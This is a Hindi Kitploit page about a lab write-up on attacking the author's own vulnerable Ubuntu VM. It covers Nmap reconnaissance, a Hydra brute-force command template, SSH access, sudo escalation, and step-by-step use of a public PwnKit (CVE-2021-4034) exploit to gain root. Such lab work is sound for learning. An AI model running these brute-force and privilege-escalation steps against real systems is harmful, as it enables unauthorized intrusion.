Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ubuntu-privesc-lab — पूर्ण पैठ परीक्षण कार्यप्रवाह: क्रेडेंशियल ब्रूट फोर्स, SSH पहुंच और विशेषाधिकार वृद्धि (CVE-2021-4034) | Kitploit
उपकरण/GitHubGitHub/vaibhavkrishna12004/ubuntu-privesc-lab
विशेषाधिकार वृद्धिटोहीनेटवर्क मैपिंगपासवर्ड हमलेपोर्ट स्कैनिंगभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशन

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
लर्निंग और शिक्षा
लैब और अभ्यास
GitHubvaibhavkrishna12004/ubuntu-privesc-lab

ubuntu-privesc-lab

पूर्ण पैठ परीक्षण कार्यप्रवाह: क्रेडेंशियल ब्रूट फोर्स, SSH पहुंच और विशेषाधिकार वृद्धि (CVE-2021-4034)

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

ubuntu-privesc-lab

पूर्ण प्रवेश परीक्षण कार्यप्रवाह: क्रेडेंशियल ब्रूट फोर्स, SSH पहुँच और विशेषाधिकार वृद्धि (CVE-2021-4034)

अवलोकन

यह परियोजना एक कमजोर Ubuntu वर्चुअल मशीन के विरुद्ध पूर्ण प्रवेश परीक्षण कार्यप्रवाह प्रदर्शित करती है। हमला श्रृंखला में टोही, क्रेडेंशियल ब्रूट फोर्सिंग, प्रारंभिक पहुँच और कई तकनीकों का उपयोग करके विशेषाधिकार वृद्धि शामिल है।

उपयोग किए गए उपकरण

Nmap Hydra SSH Git CVE-2021-4034 (PwnKit)

टोही

टोही Nmap का उपयोग करके की गई जिसने विशिष्ट नेटवर्क (वाईफ़ाई) में खुले होस्टों की संख्या का खुलासा किया। nmap < Network IP 0/24 > : इसने सक्रिय होस्टों की संख्या और उनके MAC पते का खुलासा किया। VM 1 खोजने के लिए टोही

जैसा कि देखा गया, VM ORACLE VIRTUAL BOX में चल रहा था, हम यह पता लगा सके कि यह हमारा Vuln VM था और IP इस प्रकार था।

VM 2 के लिए टोही

आगे की स्कैन ने हमले के लिए कमजोर खुले पोर्ट का पता लगाया।

प्राथमिक शोषण

इसका उपयोग करके मैंने Hydra की सहायता से एक सफल क्रेडेंशियल ब्रूट फोर्स हमले का प्रयास किया। hydra -l < USERNAME > or -L < File.txt > -p < PASSWORD > or -P < File.txt > < TARGET IP > < PORT >

Vuln VM के लिए Hydra

इस सफल पासवर्ड शोषण ने हमें SSH पोर्ट शोषण के लिए भी क्रेडेंशियल का उपयोग करने के लिए प्रेरित किया।

ssh < USERNAME@TARGET IP > Password < exploit password >

पासवर्ड से प्राप्त क्रेडेंशियल का उपयोग करके SSH शोषण

इसने हमें हमारे पीड़ित सिस्टम तक प्रारंभिक पहुँच प्रदान की। इसके अलावा sudo गलत कॉन्फ़िगरेशन ने हमें रूट तक पूर्ण पहुँच दी। sudo -l : (ALL : ALL) ALL

sudo su वृद्धि का तरीका था।

द्वितीयक शोषण

हमने "Pwnkit CVE-2021-4034" की सहायता से पीड़ित सिस्टम का शोषण करना जारी रखा।

PwnKit (CVE-2021-4034) एक गंभीर सुरक्षा कमजोरी है जिसे 2022 की शुरुआत में Qualys शोध दल द्वारा खोजा गया था, जो Linux सिस्टम पर Polkit फ्रेमवर्क को प्रभावित करता है। यह एक स्थानीय विशेषाधिकार वृद्धि (LPE) दोष है जो किसी भी सामान्य, अविशेषाधिकार प्राप्त उपयोगकर्ता को सिस्टम पर पूर्ण रूट विशेषाधिकार (प्रशासनिक पहुँच) प्राप्त करने की अनुमति देता है। यह कमजोरी Polkit की शुरुआत 2009 से मौजूद है और इसे शोषण के लिए "तुच्छ" माना जाता है, जो इसे बेहद खतरनाक बनाता है।

Common Vulnerabilities and Exposures (CVE) सॉफ्टवेयर और हार्डवेयर में साइबर सुरक्षा कमजोरियों और जोखिमों की एक मानकीकृत, सार्वजनिक रूप से प्रकट सूची है।

CVE-2021-4034 स्थापित करना और VM का शोषण करना

सबसे पहले, मैंने pkexec की उपस्थिति और अनुमतियों की जाँच करके पुष्टि की कि लक्ष्य सिस्टम संभावित रूप से कमजोर था: which pkexec परिणाम: ls -la /usr/bin/pkexec बाइनरी में SUID बिट सेट था, जो दर्शाता है कि यह रूट विशेषाधिकारों के साथ चलता है, जो इसे शोषण के लिए एक व्यवहार्य लक्ष्य बनाता है।

पर्यावरण तैयार करें

शोषण को संकलित करने के लिए, आवश्यक उपकरण स्थापित किए गए: sudo apt update sudo apt install git build-essential -y इसने सुनिश्चित किया कि सिस्टम के पास आवश्यक कंपाइलर और निर्भरताएँ हैं। यदि सिस्टम के apt में कोई पृष्ठभूमि कार्य चल रहे हों, तो उसे मार दें।

शोषण कोड स्थानांतरित / प्राप्त करें

शोषण को सीधे पीड़ित मशीन पर क्लोन किया गया: cd /tmp git clone https://github.com/berdav/CVE-2021-4034.git cd CVE-2021-4034 /tmp का उपयोग करने से अव्यवस्था से बचा जाता है और यथार्थवादी हमलावर व्यवहार को दर्शाता है। CVE-2021-4034 स्थापित करना CVE KIT के लिए Git स्थापना

शोषण संकलित करें

शोषण का उपयोग करके संकलित किया गया: "make" इसने कमजोरी को ट्रिगर करने के लिए आवश्यक निष्पादन योग्य उत्पन्न किया।

शोषण निष्पादित करें

शोषण निष्पादित किया गया: ./cve-2021-4034

विशेषाधिकार वृद्धि सत्यापित करें

निष्पादन के बाद, रूट पहुँच की पुष्टि हुई: whoami

परिणाम: root

विशेषाधिकार शोषण और VM में पहुँच

यह शोषण इसलिए काम करता है क्योंकि pkexec पर्यावरण चरों को अनुचित तरीके से संभालता है, जिससे हमलावर उन्नत विशेषाधिकारों के साथ मनमाना कोड निष्पादित कर सकते हैं।

निष्कर्ष

यह अभ्यास दर्शाता है कि कैसे एक प्रतीत होता निम्न-विशेषाधिकार प्राप्त उपयोगकर्ता PwnKit (CVE-2021-4034) जैसी ज्ञात कमजोरी का शोषण करके पूर्ण सिस्टम नियंत्रण तक बढ़ सकता है। क्रेडेंशियल समझौते के माध्यम से प्रारंभिक पहुँच को व्यवस्थित गणना और शोषण के साथ जोड़कर, केवल गलत कॉन्फ़िगरेशन पर निर्भर हुए बिना रूट पहुँच प्राप्त करना संभव था। यह समय पर पैच प्रबंधन और सुरक्षित कॉन्फ़िगरेशन प्रथाओं के महत्वपूर्ण महत्व को उजागर करता है। एक भी अनदेखी की गई कमजोरी पूर्ण सिस्टम समझौते का कारण बन सकती है, जो निरंतर सुरक्षा मूल्यांकन और गहराई में रक्षा रणनीतियों की आवश्यकता पर जोर देती है।

टूल डाउनलोड करें